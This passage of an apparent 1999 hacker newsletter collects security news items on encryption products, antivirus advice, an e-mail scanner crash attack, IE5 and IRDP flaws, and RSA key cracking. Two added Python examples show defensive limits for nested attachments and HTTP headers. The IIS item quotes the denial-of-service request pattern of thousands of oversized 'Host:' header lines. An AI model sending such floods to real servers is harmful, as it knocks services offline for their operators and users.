     "When building reputation capital, it's pretty important to
     learn to think like the boss," he said. 

     In addition to his day job, Del Torto is a member of the
     Cypherpunks, a San Francisco-based hacking organization
     that produces what he calls "no-compromise" security
     technology. 

     Del Torto had advice for his Fortune 1000 brethren, too.
     Asked if young hackers, who may not be partial to suits and
     ties, are discriminated against, Del Torto recalled that Dan
     Farmer, author of the widely used Satan network scanning
     tool, was once turned down by a prospective employer who
     found his appearance unsettling. He urged IT managers to
     avoid superficial judgments and focus on the reputation of
     the individual. IT managers interviewing young people who
     "act differently" should remember when they were young, he
     advised. 

     Del Torto noted that in the relatively small community of IT
     security professionals, people are preceded by their
     reputations. He said he knows programmers who are
     talented, but he won't hire or recommend them because
     they don't act responsibly. 


     @HWA      
     
51.0 BALTIMORE TECHNOLOGIES TO SHIP ENCRYPTION TOOL FOR XML
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/ 
     
     by Thejian, Friday 13th August 1999 on 1:00 am CET
     Baltimore Technologies expects to ship an encryption and digital signature tool kit
     that will let users secure documents based on XML later this fall. The X/Secure tool
     kit will be able to encrypt XML and allow users to authenticate recipients by digital
     signatures. Read more.       
     
     Baltimore Technologies to ship encryption tool for XML docs 

     By Ellen Messmer 
     Network World 
   
     Posted at 8:45 AM PT, Aug 12, 1999 
     Baltimore Technologies later this fall expects to ship an encryption and digital signature tool kit that will let users secure documents based on XML. 
   
     The X/Secure tool kit will let customers encrypt XML documents or use digital signatures to authenticate the identity of the author of the XML content and the
     intended recipient. Digital signatures let customers check the content of a document to ensure it was not tampered with en route to the designated recipient. 
   
     The X/Secure tool kit will be sold to meet two specific development needs, according to Sean Coughlin, Baltimore product manager. 
   
     The first use would be as a Java-based utility to run on any Java Virtual Machine in order to automatically encrypt or sign XML-based documents and verify
     signed XML documents. Second, the tool kit would let customers add digital signing and encryption capabilities to XML-based applications. 
   
     "We're basing the X/Secure tool kit on the IETF draft specification 'Digital Signatures for XML,' " Coughlin said. The World Wide Web Consortium is also
     considering this draft specification for inclusion in the suite of XML standards it shepherds, he added. Information about the specification is posted on both
     groups' Web sites. 
   
     Baltimore has not yet set a price for the X/Secure tool kit, which may be sold in two versions when it ships by the end of the third quarter. 
   
     Baltimore Technologies Inc., with headquarters in Dublin, Ireland, is at www.baltimoretechnologies.com. 
   
     For more information about enterprise networking, go to Network World Fusion at www.nwfusion.com. Copyright (c) 1999 Network World Inc. All
     rights reserved. 
     
     @HWA
     
52.0 STARTUP WANTS TO SELL UNTAPPABLE PHONES
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From http://www.net-security.org/ 
     
     by Thejian, Friday 13th August 1999 on 12:40 am CET
     Starium Inc plans to be selling telephone scrambling devices so powerful that even
     the US government's most muscular supercomputers can't eavesdrop on wiretapped
     conversations. Needless to say, the US government isn't too thrilled about the idea.
     Wired.      
     
     Starium Promises Phone Privacy
     by Declan McCullagh 
     
     3:00 a.m.  12.Aug.99.PDT
     MONTEREY, California -- The sleepy coastal town of Monterey, California, is not the kind of place where vision-fired entrepreneurs come to change
     the world. Monterey Bay is better known for sea lions than silicon, and for Cannery Row -- made famous half a century ago in John Steinbeck's
     gritty, eponymous novel. 
     
     Today, the third floor of a converted sardine factory on Cannery Row is home to a startup company developing what could become a new world
     standard in privacy protection. By early 2000, Starium Inc. plans to begin selling sub-US$100 telephone scrambling devices so powerful that even
     the US government's most muscular supercomputers can't eavesdrop on wiretapped conversations. 
     
     
     Such heavily armored privacy is currently available only to government and corporate customers who pony up about $3,000 for STU-III secure
     phones created by the US National Security Agency. By squeezing the same kind of ultra-strong encryption into a sleek brushed-steel case about
     twice the size of a Palm V -- and crafted by the same San Francisco designer -- Starium hopes to bring crypto to the masses. 
     
     "Americans by nature don't like people reading over their shoulders," says Lee Caplin, president and CEO of Starium. 
     
     True enough. But whether Americans will pay extra for privacy is open to question, especially since both people in a conversation need the Starium
     "handsets" to chat securely. 
     
     And there's another big obstacle: The US government has repeatedly tried to keep similar products off the market unless they have a backdoor for
     surveillance. Its export rules prevent Starium from freely shipping its products overseas. 
     
     Starium's three co-founders -- the company has since grown to eight people -- claim they're not fazed. 
     
     "The technology is out there. Whether they like it or not, it exists," says Bernie Sardinha, Starium chief operations officer. "You cannot stop
     progress. You cannot stop technology." 
     
     Starium at first planned to call its product CallGuard, but abandoned the name after discovering another company owned the trademark. The firm is
     considering VoiceSafe as another potential name. 
     
     Customers will use the device by plugging it into their telephone handset -- a feature allowing it to work with office systems -- and plugging the
     handset into the base of the phone. 
     
     At the touch of a "secure" button, the modems inside the two Starium units will form a link that, theoretically, creates an untappable
     communications channel. The units digitize, compress, filter, and encrypt voice communications -- and reverse the process on the other end. 
     
     The Starium handset uses a 2,048-bit Diffie-Hellman algorithm for the initial setup, and a 168-bit triple DES algorithm for voice encoding. The
     four-chip unit includes a 75 MHz MIPS processor, an infrared interface, a smart card port, and possibly serial, USB, and parallel interfaces, the
     company says. The final version will operate for over 2 hours on a pair of AA batteries. 
     
     Starium's business plan is nothing if not ambitious. In addition to selling the portable units, the company wants to add crypto capabilities to cell
     phones, faxes, and even corporate networks. Target markets include the legal, medical, banking, and even political fields. 
     
     "I've gotten a call from the George W. Bush people for use in the campaign," CEO Caplin says. 
     
     The company says it's working on deals with major cell phone manufacturers like Ericsson and Nokia to offer the same voice-scrambling in software.
     Newer cell phones have enough memory and a fast enough processor to handle the encryption. Best of all, a software upgrade could be free. 
     
     "You take your phone into a mall or a kiosk and they simply burn in the new flash ROM," Sardinha says. 
     
     The idea for Starium came from longtime cypherpunk and company co-founder Eric Blossom, who was inspired by the Clinton administration's
     now-abandoned Clipper Chip plan to devise a way to talk privately. 
     
     "I got interested around the time of Clipper. I was scratching my head saying, 'This is offensive,'" says Blossom, a former engineer at Hewlett
     Packard and Clarity Software. 
     
     Blossom created prototype devices and sold them online. But they were clunky -- about the size of a desktop modem. They were also expensive,
     and didn't sell very well. 
     
     The company's directors include Robert Kohn, former chief counsel for PGP and Borland International, and Whitfield Diffie, distinguished engineer at
     Sun Microsystems and co-inventor of public key cryptography. 
     
     @HWA
     
53.0 OUTSMARTING THE WILY COMPUTER VIRUS
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/ 
     
     by Thejian, Friday 13th August 1999 on 12:10 am CET
     CNN has yet another story on computer viruses. This one doesn't deal with any
     specific viruses however, but more with the precautions you can take. Mostly "make
     backups" and "update your AV-software" stuff you could think up yourself, but oh what
     the hell :)      
     
     Outsmart the wily computer virus 

     August 11, 1999
     Web posted at: 3:21 p.m. EDT (1921 GMT)

     by Carla Thornton 

     (IDG) -- PROBLEM: Even if your PC runs an antivirus program, the risk of
     a data-destroying infection is real. 

     SOLUTION: Take a few additional precautions to help keep your computer
     safe and sound. 

     Shane Toven never worried about computer
     viruses. The chief engineer and IS manager
     for KAXE-FM in Grand Rapids, Minnesota,
     knew that the whole staff used antivirus
     software and practiced "safe computing."
     Then last April, Chernobyl -- one of the year's
     deadliest viruses -- slipped past the public
     radio station's security. Two of the station's
     Windows 95 machines suffered full
     meltdown. 

     "At first, all of our PCs worked fine on April
     26, the day Chernobyl was supposed to hit.
     Then a couple of them quickly ground to a
     halt," remembers Toven. "When I went to
     reboot, I got the dreaded 'insert system disk'
     message. According to Fdisk, there were no
     partitions and no boot sectors -- classic signs
     of Chernobyl." 

     Feeling more than a little sheepish, Toven
     realized he hadn't updated McAfee
     VirusScan's signatures, the data files that
     identify specific viruses. (He was using an
     older version of the package that could not
     update itself automatically.) Chernobyl
     probably sneaked in "through a contaminated
     file attached to an e-mail from someone we knew," he says. The virus
     destroyed 2 gigabytes of data, including employee records, correspondence,
     and other vital files. 

     Even if you follow the usual safeguards -- installing and updating a good
     antivirus package, avoiding e-mail attachments from strangers, and never
     downloading files from the Internet -- your system probably isn't 100 percent
     safe from viruses. Few of us compute in isolation, never exchanging files with
     others. New viruses can claim casualties before antivirus vendors identify
     them. Your best line of defense is to assume your PC will become infected --
     and take steps now to save your neck. 

     Smart precautions

     Experts and survivors who've tangled with the nastiest viruses offer the
     following wisdom: 

     MAKE UPDATING SIGNATURE FILES EASY: As Toven discovered,
     the key to warding off most attacks is simply keeping your antivirus software
     updated. But remembering to check for new signature files, downloading
     them, and distributing them to the people who need them can be a hassle.
     Fortunately, most programs now remind you when signature files need to be
     updated, and will download the update for you from the company's Web site at
     the click of a button. The best, including Norton AntiVirus, PC-cillin, and
     McAfee VirusScan, perform this job automatically as often as once a day. 

     KEEP A BOOT DISK HANDY: Melissa and other Word and Excel macro
     viruses that torment most users at one time or another do little serious
     damage. But an infestation such as Chernobyl may stop your PC from even
     starting up. That's when you reach for the boot disk -- a floppy from which
     you can run the antivirus program's scanner if your PC becomes inoperable.
     Most antivirus packages give you the option of making a boot disk during
     setup. If yours does not, you can easily make your own, notes Ken Dunham,
     virus expert at About.com (formerly the Mining Company). Dunham says
     users can find instructions for creating a start-up disk, plus other virus-related
     advice, at antivirus.about.com (link below). "You should boot from a clean disk
     before removing a virus," he says. "Some viruses can't be cleaned any other
     way." 

     USE MORE THAN ONE ANTIVIRUS UTILITY: No single antivirus
     package can detect and remove every virus, so using multiple programs
     lessens the chance of a virus getting through. "Pay for one commercial
     package and add one or more free programs," suggests Dunham. "Set the
     primary package to scan all the time and use the secondary programs only
     when you need them, so they don't conflict. It's like getting a second opinion
     from a doctor." Find a list of free antivirus products at
     antivirus.about.com/library/weekly/aa051099.htm (link below). And pick up
     extra protection from a free Web-based scanning service like Trend Micro's
     HouseCall or Network Associates' McAfee Clinic (links below). 

     CLEAN UP AFTER AN INVASION: Once you rid your PC of its
     marauder, don't stop there, advises Joe Wells, author of the WildList of
     viruses. "Read up on what the virus does to files, then take steps to eliminate
     unpleasant surprises down the road," he says. "For instance, Melissa turns off
     the dialog box asking if you want to enable macros in Microsoft Word
     documents, so after disinfecting you'll need to turn that feature back on to
     remind yourself you have that security option." (In Word 97, select Tools,
     Options, click General, and check "Macro virus protection"; in Word 2000,
     select Tools, Macros, Security and choose Medium security.) 

     Back in Grand Rapids, Shane Toven was about to reformat the hard drives on
     his devastated computers when he happened upon PowerQuest's Lost &
     Found data-recovery utility (link below). "I downloaded and installed the demo,
     and in half an hour, I had recovered all my wiped-out files," reports Toven.
     Another utility, the free MRecover (link below), can also restore
     Chernobyl-savaged computers. 

     Toven got a lucky break. Your best defense: Keep backups of all your vital
     data. After his near-fatal brush with Chernobyl, Toven changed his modus
     operandi: "I went out and bought a separate NT server just for backups," he
     reports. "I also now keep clean, write-protected boot disks for each operating
     system we use." 

      Carla Thornton is a contributing editor for PC World. If you're having trouble resolving a
           PC-related hardware or software problem, we'd like to hear from you.
      
     @HWA
    
54.0 NEW MAIL ATTACK IDENTIFIED
     ~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/ 
     
     by Thejian, Thursday 12th August 1999 on 5:00 am CET
     Information security consultant R. Rosenberger says he has developed an
     e-mail-borne attack which can potentially defeat most major network security and
     anti-virus software products. Instead of slipping in undetected this attack attacks the
     security software head-on as it tries to scan e-mail attachments. The flaw is said to
     be that most security software products are unable to handle "pathological events".
     As an example is given a recursive e-mail attachment (multiple attachments in
     attachments) which could crash security products trying to scan it and which in
     turn could take the whole operating system with it, effectively shutting the server
     down. "I know of products where I can own the box, just by sending an e-mail that
     nobody receives. I can own the e-mail server, the gateway server -- anything that's
     part of the e-mail infrastructure," Rosenberger said. Full story.      
     
     http://www.internetnews.com/bus-news/article/0,1087,3_180651,00.html
     
     New Attack on E-mail Infrastructure Identified 
     August 11, 1999
     By Brian McWilliams
     InternetNews.com Correspondent 


     An information security consultant said Wednesday he's discovered a serious flaw in network security and anti-virus software products
     -- a flaw that could threaten the Internet's e-mail infrastructure. 

     According to Robert Rosenberger, he's developed an e-mail-borne attack which can potentially defeat most major security products --
     not by slipping by undetected, but by attacking the security software head-on as it tries to scan email attachments. 

     While most security software products can successfully protect themselves against code that tries to disable them, Rosenberger claims
     they also contain programming errors which render them unable to handle what he calls "pathological events". 

     One example is a recursive e-mail attachment, or multiple attachments within attachments. According to Rosenberger, when security
     products encounter such specially crafted files at the local or server level, most will crash, and take the operating system with them. 

     "I know of products where I can own the box, just by sending an e-mail that nobody receives. I can own the e-mail server, the gateway
     server -- anything that's part of the e-mail infrastructure," Rosenberger said. 

     Besides consulting to corporations and government agencies, Rosenberger is the author of the Computer Virus Myths Web site which
     criticizes anti-virus software vendors for whipping up what he calls virus hysteria in an attempt to boost sales. 

     Rosenberger recently notified Network Associates, Symantec, and several other major antivirus software vendors about his findings
     and most have promptly responded by upgrading their products to thwart the attack, which he calls the E-mail Infrastructure Security
     vulnerability. Officials of the firms were not immediately available for comment. 

     A representative of the Computer Incident Advisory Capability (CIAC) Wednesday said that organization was not aware of
     Rosenberger's findings. Officials from the Computer Emergency Response Team (CERT) were not immediately available for
     comment. 

     While he hasn't publicly released information about his exploit, Rosenberger says others could potentially discover similar flaws. 

     "In about three weeks, every wannabe hacker on the planet is going to know about this and post some kind of sample file, and they're
     going to be a lot better than mine."
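
     A scanner can treat the recursive-attachment case described above as a policy verdict rather than an input it must unpack to the bottom. The sketch below is an added example, not code from the article or from any vendor; the limit values, function names and constructed sample messages are assumptions.

```python
"""Bounded walk over nested e-mail attachments (added example; limits are assumed policy)."""
import email
from email.mime.message import MIMEMessage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

MAX_BYTES = 1_000_000   # refuse to parse anything larger (assumed value)
MAX_DEPTH = 8           # deepest attachment nesting the scanner will follow
MAX_PARTS = 200         # total MIME parts the scanner will visit


def quarantine(reason):
    """Fail closed: the message is held and the scanner keeps running."""
    return {"verdict": "quarantine", "reason": reason}


def scan_message(raw, max_depth=MAX_DEPTH, max_parts=MAX_PARTS):
    """Return a verdict for one raw message without unbounded recursion."""
    if len(raw) > MAX_BYTES:
        return quarantine("size limit exceeded")
    try:
        root = email.message_from_bytes(raw)
    except RecursionError:
        # Deep nesting can exhaust the parser's own stack; treat that as hostile.
        return quarantine("parser recursion limit hit")

    # Explicit stack instead of recursive calls, so nesting depth is a counter
    # we control rather than a property of the interpreter's call stack.
    stack = [(root, 0)]
    visited = 0
    deepest = 0
    leaves = []
    while stack:
        part, depth = stack.pop()
        visited += 1
        if visited > max_parts:
            return quarantine("part limit exceeded")
        if depth > max_depth:
            return quarantine("depth limit exceeded")
        deepest = max(deepest, depth)
        if part.is_multipart():
            # True for multipart/* containers and for message/rfc822
            # attachments, whose payload is a list holding the inner message.
            for child in reversed(part.get_payload()):
                stack.append((child, depth + 1))
        else:
            # A real scanner would hand the decoded leaf to its engine here.
            leaves.append(part.get_content_type())
    return {"verdict": "scan", "depth": deepest, "parts": visited, "leaves": leaves}


def build_nested(wraps):
    """Constructed sample: a text body wrapped `wraps` times as an attached message."""
    msg = MIMEText("hello")
    for _ in range(wraps):
        outer = MIMEMultipart()
        outer.attach(MIMEMessage(msg))
        msg = outer
    return msg.as_bytes()


if __name__ == "__main__":
    print(scan_message(build_nested(2)))    # ordinary forwarded mail
    print(scan_message(build_nested(20)))   # pathological nesting
```

     The size check runs before parsing because the traversal limits only bound the walk, not the work the parser has already done.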
     
     @HWA
     
55.0 ERROR IN MICROSOFT PATCH
     ~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/ 
     
     by Thejian, Thursday 12th August 1999 on 4:30 am CET
     On 11 August 1999, Microsoft released a patch for the "Malformed HTTP Request
     Header" vulnerability. An error has been discovered in that patch. Microsoft has
     removed the patch from their ftp and are working on correcting the error and expect to
     re-release the patch in a few days. MS Advisory. 
     
     http://www.microsoft.com/security/bulletins/ms99-029regression.asp
     
     
     From http://www.securityfocus.com/
     
     NT IIS Malformed HTTP Request Header DoS Vulnerability

            
      Bugtraq ID: 579
      Failure to Handle Exceptional Conditions

      Remote:     Yes

      Local:      Yes

      Published:  August 11, 1999

      Updated:    August 13, 1999

           Microsoft Commercial Internet System 2.5
           Microsoft Commercial Internet System 2.0
           Microsoft IIS 4.0
              + Microsoft Windows NT 4.0
              - Microsoft BackOffice 4.5
                 - Microsoft Windows NT 4.0
           Microsoft Site Server 3.0 Commerce Edition
              - Microsoft Windows NT 4.0
              - Microsoft IIS 4.0
                 + Microsoft Windows NT 4.0
                 - Microsoft BackOffice 4.5
                    - Microsoft Windows NT 4.0
           Microsoft Site Server 3.0
              + Microsoft Site Server 3.0 Commerce Edition
                 - Microsoft Windows NT 4.0
                 - Microsoft IIS 4.0
                    + Microsoft Windows NT 4.0
                    - Microsoft BackOffice 4.5
                       - Microsoft Windows NT 4.0
              + Microsoft Commercial Internet System 2.0
              + Microsoft BackOffice 4.5
                 - Microsoft Windows NT 4.0
              + Microsoft BackOffice 4.0
                 - Microsoft Windows NT 4.0
                 
      Microsoft IIS and all other products that use the IIS web engine have a
      vulnerability whereby a flood of specially formed HTTP request headers
      will make IIS consume all available memory on the server and then
      hang. IIS activity will be halted until the flood ceases or the service is
      stopped and restarted.
      
      Quoted from Nobuo Miwa's post to Bugtraq:

      Simple play. I sent lots of "Host:aaaaa...aa" to IIS like...

      GET / HTTP/1.1
      Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
      Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
      ...10,000 lines
      Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)

      I sent twice above request sets. Then somehow victim IIS got memory
      leak after these requests. Of course, it can not respond any request
      any more. If you try this, you should see memory increase through
      performance monitor. You would see memory increase even after those
      requests finished already. It will stop when you got shortage of virtual
      memory. After that, you might not be able to restart web service and you
      would restart computer. I tried this against Japanese and English
      version of Windows NT.
      
      Microsoft released a patch for this vulnerability on August 11, 1999.
      However, on August 12, 1999 they retracted it due to an error that
      made IIS hang whenever the logfile was an exact multiple of 64KB.
      Microsoft is working to correct this error, and will re-release the patch
      when it is solved.
      
           

      Reported to Microsoft by Nobuo Miwa <n-miwa@lac.co.jp>.
      Microsoft Security Bulletin MS99-029 released August 11,
      1999.


      advisory:
               MS99-029: Patch Available for "Malformed HTTP
               Request Header" Vulnerability
               (MS)
      web page:
               Frequently Asked Questions: Microsoft Security
               Bulletin (MS99-029)
               (Microsoft)
      web page:
               Error in Patch for "Malformed HTTP Request
               Header" Vulnerability
               (Microsoft)
      message:
               IIS 4.0 remote DoS (MS99-029)
               (Nobuo Miwa <n-miwa@lac.co.jp>)
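
      The request quoted in the advisory only works if the server keeps accepting header lines; a request-head reader with hard limits refuses it after a few hundred bytes. This is an added example, not Microsoft's patch or code from the advisory; the limit values, function names and the constructed sample input are assumptions.

```python
"""Bounded HTTP request-head reader (added example; limits are assumed policy)."""
import io

MAX_LINE = 8192          # longest request line or header line accepted
MAX_HEADERS = 100        # header fields per request
MAX_HEAD_BYTES = 65536   # request line plus all header lines


class HeadRejected(Exception):
    def __init__(self, status, reason, consumed):
        super().__init__(reason)
        self.status, self.reason, self.consumed = status, reason, consumed


def read_request_head(stream):
    """Read one request head from a binary stream, rejecting as early as possible.

    Returns (request_line, headers, consumed). Only the current line is held
    while checking, so a flood of header lines is refused without being stored.
    """
    consumed = 0
    count = 0
    request_line = None
    headers = {}
    while True:
        line = stream.readline(MAX_LINE + 1)
        consumed += len(line)
        if len(line) > MAX_LINE:
            raise HeadRejected(431, "line too long", consumed)
        if not line.endswith(b"\n"):
            raise HeadRejected(400, "incomplete request head", consumed)
        if consumed > MAX_HEAD_BYTES:
            raise HeadRejected(431, "request head too large", consumed)
        line = line.rstrip(b"\r\n")
        if request_line is None:
            if len(line.split(b" ")) != 3:
                raise HeadRejected(400, "malformed request line", consumed)
            request_line = line.decode("latin-1")
            continue
        if not line:
            return request_line, headers, consumed
        count += 1
        if count > MAX_HEADERS:
            raise HeadRejected(431, "too many header fields", consumed)
        name, sep, value = line.partition(b":")
        if not sep or not name or name != name.strip():
            raise HeadRejected(400, "malformed header field", consumed)
        key = name.decode("latin-1").lower()
        if key == "host" and key in headers:
            # HTTP/1.1 requires a 400 response when Host appears more than once.
            raise HeadRejected(400, "duplicate Host header", consumed)
        headers.setdefault(key, []).append(value.strip().decode("latin-1"))


def check_head(raw):
    """Run the reader over raw bytes: (status, reason, bytes consumed)."""
    try:
        _, _, consumed = read_request_head(io.BytesIO(raw))
        return 200, "accepted", consumed
    except HeadRejected as exc:
        return exc.status, exc.reason, exc.consumed


def sample_head(lines, width=200):
    """Constructed input with the shape of the request quoted in the advisory."""
    return b"GET / HTTP/1.1\r\n" + (b"Host: " + b"a" * width + b"\r\n") * lines + b"\r\n"


if __name__ == "__main__":
    print(check_head(b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"))
    print(check_head(sample_head(10000)))
```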
                 
     
     @HWA
     
56.0 NEW IE5 BUG EXPOSES PASSWORDS
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
     
     From http://www.net-security.org/ 
 
     by Thejian, Thursday 12th August 1999 on 4:00 am CET
     Techweb reports the following: "Bug-reporting sites have identified a new security
     problem with Microsoft's Internet Explorer 5.0 browser. When users access an
     FTP-protected site and then try to download files, their user name and password can
     be exposed to snoopers. So far, there are no known cases of any break-ins caused
     by the glitch." Techweb.
     
     http://www.techweb.com/wire/story/TWB19990811S0013
     

     @HWA
     
57.0 KEY TO CRYPTO SUCCESS: DON'T BE BORN IN THE USA
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/ 
     
      
     by Thejian, Thursday 12th August 1999 on 3:20 am CET
     Forbes has a story on a new crypto company setting up shop in the States, but
     which is able to evade the US restrictions on the export of sensitive crypto because
     their product designers reside in Sweden. Read more on the company and its
     products here.      
     
     http://www.forbes.com/forbes/99/0823/6404078a.htm
     

     An encryption firm finds the key to success: not being born in the U.S.A. 
     
     Data lock 
     
     By Nikhil Hutheesing 
     
     E-COMMERCE will really take off only after we find better ways to keep sensitive personal and corporate data under lock and key. Keeping data secure yet accessible
     to the right people is harder than you might think. 
     
     Protegrity, a Swedish firm invading the U.S. market by setting up its headquarters in Stamford, Conn., is making this market its own. One reason it can beat out U.S.
     competitors in landing business from firms that span the globe: It can run around U.S. export restrictions on encryption software. Since it's a foreign-born business, it can
     sell abroad without running afoul of U.S. export laws. It ships software from Sweden. 
     
     Protegrity's roots go back to 1994, when Ulf Dahl, a business executive who managed a software company in Stockholm, was writing software that would let city
     governments store personal data--such as marriage certificates and medical histories--while keeping those data separate from citizens' names and inaccessible to
     snoops. He came across Anonymity Protection, a Swedish startup in Gothenburg that was creating encryption software, and joined it. 
     
     Dahl and the engineers at Anonymity devised two programs. One sits on a server and stores the company's security policy, including information on who may access
     which account files. That information is securely transmitted to all the other servers--perhaps thousands of them--that plug into a company's databases. A second
     program then encrypts the designated files on the database. 
     
     Note that this lock and key is a bit different from what you usually see in a computer network storing sensitive data. Your brokerage firm, for example, often stores your
     account data and password in unencrypted form on a server. It protects your information by encrypting the transmission of the data across phone lines. Your password
     is scrambled as it leaves your modem, thwarting an eavesdropper who might tap into the phone line. But the trading records are stored in plain text. Someone breaking
     into the broker's database server could get access to them. 
     
     In the Protegrity system, you encrypt only the specific data you want to keep hidden from snoops while leaving other data accessible to internal users or outsiders
     tapping in, perhaps, over the Internet. Data can be encrypted at 128 bits or higher (you could need more computers than the Pentagon has to crack the code). 
     
     Getting hold of data by unauthorized users is tough because a series of events, transparent to the user, have to occur. When you try to gain access to information,
     Protegrity's system checks to see if you have been included as an authorized user in the gatekeeper. If you pass that, it goes on to double-check that the database that
     keeps your data is also instructed to let you in. Then it checks a series of rules that determine the information you are allowed to see. Once you pass those steps, and the
     system sees you are allowed to see the encrypted data, it generates a decryption key that is stored by the gatekeeper in encrypted form. 
     
     In 1996 Protegrity set up shop above a restaurant overlooking a marina in Stamford. "I realized that to make a success of this product, I would have to go where the
     market was," explains Dahl. To run the show, the company hired David Morris, who had been an executive vice president at Cylink, a manufacturer of cryptographic
     products. 
     
     Although Protegrity had become naturalized, it keeps its product designers in Sweden. The company continues to enjoy its exemption from the U.S. ban on exporting
     sensitive encryption technology. 
     
     That ban was meant to prevent hostile nations and criminals from talking in ways that G-men can't understand, yet its effect has been to hand foreign firms a huge
     advantage in the market for software to encrypt and decrypt sensitive files. That software segment could be worth $9 billion in sales over the next five years, says the
     Economic Strategy Institute. At the end of 1997 there were already 653 encryption products being made in 29 countries outside of the U.S. 
     
     Unlike Protegrity, American encryption companies have to engage in some fancy footwork to stay legal. "It's like defusing mines--one wrong turn and the mine could
     explode," says Stewart Baker, a partner in the law firm Steptoe & Johnson in Washington, D.C. For instance, if only two of a firm's engineers, one in the U.S. and one
     abroad, were to exchange insights about an encryption algorithm, the U.S. government could shut the company down, fine it $1 million and jail its employees. 
     
     Tiny Protegrity has yet to turn a profit, but that could change. Oracle, IBM and Informix all promote a version of Protegrity's software that works with their databases. 
     
     Customers are also putting more of their sensitive data on-line. Lucent Technologies, which uses Informix's databases attached to a Protegrity security system, now lets
     companies that buy wireless equipment log on to its Web site to pull up their account information. Before the switchover a few months ago, customer data had been kept
     separate, and could be provided only by fax or phone. 
     
     Roche Holdings' Swedish offices used Protegrity to integrate patient information into its database. Now doctors there can key in the names of their patients, the drugs
     they take and the side effects. If Roche's database detects a dangerous trend--say, too many patients begin fainting--Roche could quickly notify all the doctors. 
     
     There is pressure on the government to loosen the U.S. export laws on encryption. But even if that happens, Protegrity and its offshore rivals will have a head start over
     any U.S. competitors. 

     
     @HWA
     
58.0 L0PHT IRDP ADVISORY
     ~~~~~~~~~~~~~~~~~~~

     From http://www.net-security.org/ 
       
     by Thejian, Thursday 12th August 1999 on 3:40 am CET
     "Companies and users of broadband modems beware: Malicious hackers may be
     "listening" in on your computer's conversation across the Internet." ZDNet picks up on
     the IRDP advisory released today by L0pht Heavy Industries, a flaw which could allow
     an unauthorized user to intercept outgoing information, possibly modify unencrypted
     or lightly encrypted data or deny service to the network. ZDNet story. 
     
     --------------------------------------------------------------
     This story was printed from ZDNN,
     located at http://www.zdnet.com/zdnn.
     --------------------------------------------------------------
     
     Hackers may be snooping on you
     By Robert Lemos, ZDNN
     August 11, 1999 5:41 PM PT
     URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2313209,00.html
     
     Companies and users of broadband modems beware: Malicious hackers may be "listening" in on your
     computer's conversation across the Internet.
     
     That's the danger highlighted in a security advisory released on Wednesday by hacker-cum-security
     specialists L0pht Heavy Industries. The flaw affects Windows 95, 98 and 2000 as well as the
     SunOS and Solaris 2.6 running a network service known as the ICMP router discovery protocol, or
     IRDP, that determines the route computers use to connect to the Internet.
     
     The result: An unauthorized user can intercept outgoing information, possibly modify unencrypted or
     lightly encrypted data, or deny service to the network. 
     
     A slight detour for data
     Except for the denial of service attack, the malicious programmer needs to be inside the network,
     stated the advisory. For cable modem users, however, an internal user could be anyone on the local
     loop -- a neighbor or someone on the next block. Since many cable-modem-based networks use the
     rerouting technology, users are left open to someone snooping their communications to the Internet. 
     
     In essence, another computer on the same network can be used to change the default path that
     packets take out to the Internet. By placing the address of their own server in the system, an
     attacker can look at all the outgoing packets of information. 
     
     While it's a bit of a one-sided conversation -- since incoming packets enter the network normally -- a
     great deal of information can be gleaned from the outgoing packets, possibly including passwords
     and credit card numbers.
     
     The most worrisome part of the flaw on Microsoft Windows is that the operating system continues
     to be vulnerable even when the user believes they have closed the hole. (See the L0pht advisory.) 
     
     Some assembly required 
     In a move long considered controversial, L0pht has decided to release the source code to the basics
     of a program that could exploit such a hole.
     
     However, L0pht did delay the release of the advisory at Microsoft's request, said one L0pht
     member, known by his handle Space Rogue, in an e-mail.
     
     Microsoft and Sun Microsystems Inc. declined to offer comment while members of L0pht could not
     be contacted. 
     
     @HWA
         
59.0 Stronger computers, easier encrypton, RSA coding
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.403-security.org/
     
     Astral 12.08.1999  resource section is going to have more than 1000 links till the end of the day
     
     If a new computer design gets built, the keys of banks and other organisations could be an easy target for big companies,
     because that kind of computer would cost "only" $2 million and that is not so much money for big companies. Adi Shamir
     helped to develop the new computer and the new design of crypting known as RSA. Computer scientists said his work underscores the
     growing vulnerability of the most commonly used short form of RSA keys, which consists of just 512 bits. The key - a
     sequence of 1s and 0s, or bits - unlocks the secret coding of a computer transmission so it can be deciphered.
     Links:
     TechServers      
     http://www.techserver.com/noframes/story/0,2294,81475-128761-902330-0,00.html
     
     Code-breakers are gaining on cryptography 
     
     Copyright © 1999 Nando Media
     Copyright © 1999 Associated Press
     
     
     BY JEFF DONN 
     
     WORCESTER, Mass. (August 13, 1999 10:29 a.m. EDT http://www.nandotimes.com) - Computer encryption experts say a new computer design, if built, could
     crack the secret keys that now protect the bulk of electronic commerce. 
     
     The estimated cost of such a computer - $2 million - would be manageable for many organizations. But most highly sensitive military, banking and other
     data are already protected by stronger keys, according to cryptographers at the conference where the design was shown. 
     
     The commonly used weaker keys, though, would become "easy to break for large organizations," said cryptographer Adi Shamir of the Weizmann
     Institute of Science in Rehovot, Israel. 
     
     He developed both the new computer design and helped invent the widespread coding system - known as RSA public-key encryption - that it attacks. 
     
     Shamir spoke Thursday at the opening of a two-day conference of more than 120 cryptography experts from around the world at Worcester Polytechnic
     Institute. 
     
     Computer scientists said his work underscores the growing vulnerability of the most commonly used short form of RSA keys, which consists of just 512
     bits. The key - a sequence of 1s and 0s, or bits - unlocks the secret coding of a computer transmission so it can be deciphered. 
     
     Shamir dubs his idea for the computer Twinkle, which stands for The Weizmann Institute Key Locating Engine and also refers to the twinkle of its light
